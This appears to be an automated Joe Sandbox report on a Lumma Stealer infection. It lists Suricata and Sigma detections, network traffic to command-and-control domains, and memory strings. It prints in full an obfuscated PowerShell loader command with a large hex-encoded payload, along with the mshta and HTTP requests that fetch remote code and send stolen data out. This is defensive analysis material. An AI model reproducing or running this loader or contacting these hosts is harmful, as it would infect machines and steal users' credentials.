F427E409688C24F8BB3BD0F3DB16EAABE36CD48798812B320FEA85CA4F71867DC6D48582D5777965011C7B4801FB2CDB18E83428C7808F638DAAF946C009B3F07F09FF06C12C76831DD7747D232DFD24FB9801CADBFD5E5EC908A1E51EC88CDE84AF039CE48EFE74A558CA4CBD92F3BCFA89B2AA00759AF0A0859F3F4ED35DBE2626C1F3844FACFBE69C3AF62DE312661FA0A1C9EF460D20A5D199852B92C4883BFF88E5B2F1FDABA90D71163E5DDB1A17351D3D569C380BD9B27019E63CAD3FBC9C1BF7848CF286360E4C58DC0982C67C6AEF5785616C9877FDCC9B73B1A787A21FBB8F5F7E06CCEF0CBA53610C8E0459F28EE99160390976D4765E779A2A809EC1AB4F2D73A45E246DFF920777B514611903535C5ED407ADDBF093B0601148111BDF803C8B56E525FA9858F48A247B21967016E863E2168D3C4E89C41F15B44CEDBF3C30A49DB22F27A6E8D16F4FDB02943C76ACD372022387AC294C26B60DAF5F676870DAA3C0FB0B090D7996806834504CCE1C17B4E8229467DA457082CAF7F79AC294EB12BF534C76E52C69F0E157B56FD8069B76BDB2EED8385CD903FA7A13DA82CDBF4E8A8CF38A0A2E5F4242E1C26E5BCB6F3AF8E2445C1B494CCB5C69DC58B7746F0C79D2DA716530BDCA02459C015DBB2ABEA4BECB26097E41CE2FBD300A920FD18318366C5D4B7A04C833A236496C4C8A6188EE9A72760FA54EB5221B2960085B7A18CBB9E11E7CC4689666D213681E9A7D41F02061038A45FF0FE8EBBC097E9B2E8CAC4EDF3BF43758115832CE1E28283D795091E9DAAAC752BD4A4516CE6DDB72B53E8186CA1A4D77D156AFBE03BE987790E9776784A6E70627F727ED765D7F51E83778A499E2FF2CD51DA0DBFD933914AEF22FD2CDEAEB1305C5570317DB8D7475A9AD738EBF387927CED9E50E2B520DD916ED2A173D9E003B4C8EF8F37E793194E4E01D9D0CF44488AFE08088233788987E7EF92C4EA59C09AE3C6978D85B80137C2B4DC42B109F4299AB74B6133D2390EB63B68D01047C56B1C0BAD51059ED21678A8D190F8061EF4644822357A50DF94B8A4E44A6420B241971988F3D27094F5CC39FE50EFB4536F7FF84CB61206C5799806EE78F9E92132F0629C8062B57966710BDE9EF5D86960E07F6CAC367FC1C647D09612B8C1B9FCADAD251FDD08F3143C2A62095850DE26FAB05330A6052FC0C7B88A7633F8EB38E499149753BB3838C0CFCDFD806F53E3DF94F3B82207E016C20A230EA548FAAA34253FDA1400710D76D7406BAE6A40B73B79AD689C21A5D886E4AF2806C14F3364355409B48AF74043DA8F661C1504E41E526A00634CB7BE67747BCECEB4FDFBB3CAB9FA8A9889564D5F64BEF7D5626DA881E86F666BDFA8158678EDB2A26053A13025B2AE8B26218E13D
                    Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function ERrXH($NPRZ){return -split ($NPRZ -replace '..', '0x$& ')};$ZMcko = ERrXH('6C99A336230E5A2C9C9A564A467FCC7257DD8D73078CDDBE02A1C1E1CFEDEF1F69966C54CB1E0285E1AC81545FC7B37E41947EEF4312D686A1E5ECA561E4B330B6BA4E39137E46B1CF88F17B1CB79DDD3D8F77137F26D2026351102801E1B8EE83DC3C63D271BF7B2D32A103440FFAF27E51B9A655BC0FF4EAF17755211742BE41D6E00A001C4AB1700E496BCEB4C89D00508B0B68540C20C935204C74F180AA8B22C7493BDE52C7E082CAA9BE5DA2E40EDA75A53BD815D984B8564B6C5038B4A08214FF76BAA31263424BB9E93A9CE0F6F32C5E9C04A3878210984A5C49EF44488BBF880C62CFC91A641624C5D3BBD2FC8D663749EC8640E19E84846FD13EBD37FE167ECAADF42A3A5F25585727DE5C37C223ECF8D8B397DCD90774ADCB0FD58898F52117E75CF08D8FF61DB1811D9B84EFF315D837D713331AFE66E19BFD84FF8BA54B199FCB0269CBE56507C12EA8637FEA0A67B6D12314008A1A25D934DBDC48FA684F23E9C501CDA3D6EDD7E1DB27877FEBE1B1434E17BC899F36D51BA739F6507615383E3B76DC4DA7CF7DB096F71CD34EF427E409688C24F8BB3BD0F3DB16EAABE36CD48798812B320FEA85CA4F71867DC6D48582D5777965011C7B4801FB2CDB18E83428C7808F638DAAF946C009B3F07F09FF06C12C76831DD7747D232DFD24FB9801CADBFD5E5EC908A1E51EC88CDE84AF039CE48EFE74A558CA4CBD92F3BCFA89B2AA00759AF0A0859F3F4ED35DBE2626C1F3844FACFBE69C3AF62DE312661FA0A1C9EF460D20A5D199852B92C4883BFF88E5B2F1FDABA90D71163E5DDB1A17351D3D569C380BD9B27019E63CAD3FBC9C1BF7848CF286360E4C58DC0982C67C6AEF5785616C9877FDCC9B73B1A787A21FBB8F5F7E06CCEF0CBA53610C8E0459F28EE99160390976D4765E779A2A809EC1AB4F2D73A45E246DFF920777B514611903535C5ED407ADDBF093B0601148111BDF803C8B56E525FA9858F48A247B21967016E863E2168D3C4E89C41F15B44CEDBF3C30A49DB22F27A6E8D16F4FDB02943C76ACD372022387AC294C26B60DAF5F676870DAA3C0FB0B090D7996806834504CCE1C17B4E8229467DA457082CAF7F79AC294EB12BF534C76E52C69F0E157B56FD8069B76BDB2EED8385CD903FA7A13DA82CDBF4E8A8CF38A0A2E5F4242E1C26E5BCB6F3AF8E2445C1B494CCB5C69DC58B7746F0C79D2DA716530BDCA02459C015DBB2ABEA4BECB26097E41CE2FBD300A920FD18318366C5D4B7A04C833A236496C4C8A6188EE9A72760FA54EB5221B2960085B7A18CBB9E11E7CC4689666D213681E9A7D41F02061038A45FF0FE8EBBC097E9B2E8CAC4EDF3BF43758115832CE1E28283D795091E9DAAAC752BD4A4516CE6DDB72B53E8186CA1A4D77D156AFBE03BE987790E9776784A6E70627F727ED765D7F51E83778A499E2FF2CD51DA0DBFD933914AEF22FD2CDEAEB1305C5570317DB8D7475A9AD738EBF387927CED9E50E2B520DD916ED2A173D9E003B4C8EF8F37E793194E4E01D9D0CF44488AFE08088233788987E7EF92C4EA59C09AE3C6978D85B80137C2B4DC42B109F4299AB74B6133D2390EB63B68D01047C56B1C0BAD51059ED21678A8D190F8061EF4644822357A50DF94B8A4E44A6420B241971988F3D27094F5CC39FE50EFB4536F7FF84CB61206C5799806EE78F9E92132F0629C8062B57966710BDE9EF5D86960E07F6CAC367FC1C647D09612B8C1B9FCADAD251FDD08F3143C2A62095850DE26FAB05330A6052FC0C7B88A7633F8EB38E499149753BB3838C0CFCDFD806F53E3DF94F3B82207E016C20A230EA548FAAA34253FDA1400710D76D7406BAE6A40B73B79AD689C21A5D886E4AF2806C14F3364355409B48AF74043DA8F661C1504E41E526A00634CB7BE67747BCECEB4FDFBB3CAB9FA8A9889564D5F64BEF7D5626DA881E86F666BDFA8158678EDB2A26053A13025B2AE8B26218E13D

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-21T20:15:17.320337+010020283713Unknown Traffic192.168.2.449820172.67.151.193443TCP
                    2024-12-21T20:15:30.559614+010020283713Unknown Traffic192.168.2.449821172.67.151.193443TCP
                    2024-12-21T20:15:33.167030+010020283713Unknown Traffic192.168.2.449822172.67.151.193443TCP
                    2024-12-21T20:15:35.427327+010020283713Unknown Traffic192.168.2.449823172.67.151.193443TCP
                    2024-12-21T20:15:37.627879+010020283713Unknown Traffic192.168.2.449824172.67.151.193443TCP
                    2024-12-21T20:15:39.914752+010020283713Unknown Traffic192.168.2.449825172.67.151.193443TCP
                    2024-12-21T20:15:42.264208+010020283713Unknown Traffic192.168.2.449826172.67.151.193443TCP
                    2024-12-21T20:15:43.815217+010020283713Unknown Traffic192.168.2.449827172.67.151.193443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-21T20:15:29.277426+010020546531A Network Trojan was detected192.168.2.449820172.67.151.193443TCP
                    2024-12-21T20:15:31.626648+010020546531A Network Trojan was detected192.168.2.449821172.67.151.193443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-21T20:15:29.277426+010020498361A Network Trojan was detected192.168.2.449820172.67.151.193443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-21T20:15:31.626648+010020498121A Network Trojan was detected192.168.2.449821172.67.151.193443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-21T20:15:43.119694+010020480941Malware Command and Control Activity Detected192.168.2.449826172.67.151.193443TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results
                    Source: unknownHTTPS traffic detected: 172.67.131.114:443 -> 192.168.2.4:49732 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.131.114:443 -> 192.168.2.4:49732 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.18.182:443 -> 192.168.2.4:49733 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.183.27:443 -> 192.168.2.4:49737 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.151.193:443 -> 192.168.2.4:49820 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.151.193:443 -> 192.168.2.4:49821 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.151.193:443 -> 192.168.2.4:49822 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.151.193:443 -> 192.168.2.4:49823 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.151.193:443 -> 192.168.2.4:49824 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.151.193:443 -> 192.168.2.4:49825 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.151.193:443 -> 192.168.2.4:49826 version: TLS 1.2
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: powershell.exe, 00000006.00000002.2728791502.0000000008FA0000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: powershell.exe, 00000006.00000002.2728791502.0000000008FA0000.00000004.08000000.00040000.00000000.sdmp
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 077FA4CAh6_2_077FA450
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 077FA4CAh6_2_077FA691
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 077F7C26h6_2_077F7878
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 077FA4CAh6_2_077FA440
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 077F7C26h6_2_077F7888

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49821 -> 172.67.151.193:443
                    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49821 -> 172.67.151.193:443
                    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49820 -> 172.67.151.193:443
                    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49820 -> 172.67.151.193:443
                    Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49826 -> 172.67.151.193:443
                    Source: global trafficHTTP traffic detected: GET /hubus.xlm HTTP/1.1Host: atsuka.thrivezest.orgConnection: Keep-Alive
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49820 -> 172.67.151.193:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49821 -> 172.67.151.193:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49827 -> 172.67.151.193:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49825 -> 172.67.151.193:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49822 -> 172.67.151.193:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49823 -> 172.67.151.193:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49824 -> 172.67.151.193:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49826 -> 172.67.151.193:443
                    Source: global trafficHTTP traffic detected: GET /awjxs.captcha HTTP/1.1Accept: */*Accept-Language: en-CHAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: solve.fizq.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /winwidgetshp.json HTTP/1.1Accept: */*Accept-Language: en-CHAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: atsukaa.thrivezest.org
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: locketplyxx.click
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 80Host: locketplyxx.click
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=A68GT5UNDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18110Host: locketplyxx.click
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=VNXJOJS592EHRELIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8773Host: locketplyxx.click
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=BWQXN3MR8YL0TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20408Host: locketplyxx.click
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ZNDRC0WEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1199Host: locketplyxx.click
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QTRNNL8AAPBPJ18XQIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1129Host: locketplyxx.click
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /awjxs.captcha HTTP/1.1Accept: */*Accept-Language: en-CHAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: solve.fizq.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /winwidgetshp.json HTTP/1.1Accept: */*Accept-Language: en-CHAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: atsukaa.thrivezest.org
                    Source: global trafficHTTP traffic detected: GET /hubus.xlm HTTP/1.1Host: atsuka.thrivezest.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: solve.fizq.net
                    Source: global trafficDNS traffic detected: DNS query: atsukaa.thrivezest.org
                    Source: global trafficDNS traffic detected: DNS query: atsuka.thrivezest.org
                    Source: global trafficDNS traffic detected: DNS query: locketplyxx.click
                    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: locketplyxx.click
                    Source: powershell.exe, 00000006.00000002.2722957905.0000000007AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microXz
                    Source: powershell.exe, 00000006.00000002.2683246502.0000000003561000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                    Source: powershell.exe, 00000004.00000002.1759303262.0000000005E7D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2688123535.00000000063DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000006.00000002.2688123535.00000000054C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000004.00000002.1756039105.0000000004E11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2688123535.0000000005371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000006.00000002.2688123535.00000000054C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 00000004.00000002.1756039105.0000000004E11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2688123535.0000000005371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                    Source: powershell.exe, 00000004.00000002.1756039105.00000000050A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://atsuka.thri
                    Source: powershell.exe, 00000006.00000002.2688123535.00000000054C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://atsuka.thrivezest.org
                    Source: powershell.exe, 00000006.00000002.2722957905.0000000007AD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atsuka.thrivezest.org/hubus.xlm
                    Source: powershell.exe, 00000004.00000002.1752567349.0000000000DC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atsukaMicrosoft.PowerShell.Utility.psd1
                    Source: mshta.exe, 00000002.00000003.1771739310.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1778219952.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1780742700.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1769456285.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1693843540.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1777417643.000000000288D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atsukaa.thrivezest.org/
                    Source: mshta.exe, 00000002.00000003.1693843540.000000000288D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atsukaa.thrivezest.org/5
                    Source: mshta.exe, 00000002.00000003.1693843540.000000000288D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atsukaa.thrivezest.org/=
                    Source: mshta.exe, 00000002.00000003.1693843540.000000000288D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atsukaa.thrivezest.org/A
                    Source: mshta.exe, 00000002.00000003.1777417643.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1772347259.000000000A689000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atsukaa.thrivezest.org/winwidgetshp.json
                    Source: mshta.exe, 00000002.00000003.1693843540.000000000288D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atsukaa.thrivezest.org/winwidgetshp.json$
                    Source: mshta.exe, 00000002.00000003.1771739310.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1778219952.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1780742700.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1769456285.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1777417643.000000000288D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atsukaa.thrivezest.org/winwidgetshp.json.
                    Source: mshta.exe, 00000002.00000003.1771739310.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1778219952.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1780742700.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1769456285.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1769853728.0000000002851000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1777417643.000000000288D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atsukaa.thrivezest.org/winwidgetshp.json...
                    Source: mshta.exe, 00000002.00000002.1780566253.0000000002851000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atsukaa.thrivezest.org/winwidgetshp.json...#
                    Source: mshta.exe, 00000002.00000003.1771739310.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1778219952.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1780742700.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1769456285.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1777417643.000000000288D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atsukaa.thrivezest.org/winwidgetshp.json..z
                    Source: mshta.exe, 00000002.00000003.1771480219.0000000006022000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1781742973.0000000006024000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1778187959.0000000006024000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atsukaa.thrivezest.org/winwidgetshp.jsonLMEMh
                    Source: mshta.exe, 00000002.00000002.1780491808.0000000002802000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1777514381.0000000002801000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atsukaa.thrivezest.org/winwidgetshp.jsonetCookiesx
                    Source: mshta.exe, 00000002.00000003.1778635657.0000000009484000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://atsukaa.thrivezest.org/winwidgetshp.jsoneval(GbaEXk.replace(/(..)./g
                    Source: mshta.exe, 00000002.00000003.1771739310.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1778219952.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1780742700.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1769456285.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1777417643.000000000288D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atsukaa.thrivezest.org/winwidgetshp.jsonf
                    Source: mshta.exe, 00000002.00000003.1778635657.0000000009475000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://atsukaa.thrivezest.org/winwidgetshp.jsonhttps://atsukaa.thrivezest.org/winwidgetshp.json
                    Source: mshta.exe, 00000002.00000003.1778635657.0000000009484000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://atsukaa.thrivezest.org/winwidgetshp.jsonhttps://atsukaa.thrivezest.org/winwidgetshp.jsonhttp
                    Source: mshta.exe, 00000002.00000003.1778044565.000000000286D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1769853728.000000000286D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1780645994.000000000286D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atsukaa.thrivezest.org/winwidgetshp.jsonnC:
                    Source: mshta.exe, 00000002.00000003.1777514381.000000000282C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1780491808.000000000282C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atsukaa.thrivezest.org/winwidgetshp.jsonstoryHistory.IE5x
                    Source: mshta.exe, 00000002.00000003.1771739310.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1778219952.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1780742700.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1769456285.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1777417643.000000000288D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atsukaa.thrivezest.org/winwidgetshp.jsont
                    Source: mshta.exe, 00000002.00000003.1771739310.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1778219952.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1780742700.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1769456285.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1693843540.000000000288D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1777417643.000000000288D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atsukaa.thrivezest.org/winwidgetshp.jsonz
                    Source: powershell.exe, 00000006.00000002.2688123535.00000000063DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000006.00000002.2688123535.00000000063DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000006.00000002.2688123535.00000000063DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000006.00000002.2688123535.00000000054C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000006.00000002.2728791502.0000000008FA0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                    Source: powershell.exe, 00000006.00000002.2728791502.0000000008FA0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                    Source: powershell.exe, 00000006.00000002.2728791502.0000000008FA0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                    Source: powershell.exe, 00000004.00000002.1756039105.000000000577C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                    Source: mshta.exe, 00000002.00000003.1769853728.0000000002844000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1780566253.0000000002846000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comt
